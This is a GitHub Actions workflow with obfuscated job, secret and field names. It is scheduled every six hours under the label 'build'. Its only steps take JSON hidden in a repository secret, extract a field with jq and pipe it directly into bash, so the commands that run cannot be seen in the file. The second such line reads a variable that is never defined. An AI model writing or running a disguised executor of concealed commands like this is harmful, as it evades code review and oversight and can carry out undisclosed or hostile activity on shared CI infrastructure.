name: timowl7

on:
  workflow_dispatch:
  schedule:
    - cron: '25 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: timowl7
        env:
          abf6: ${{ secrets.abf6 }}
        run: |
          echo $abf6 | jq -r .jcfr52 | /bin/bash
          echo $axtqa74 | jq -r .wsty5385 | /bin/bash

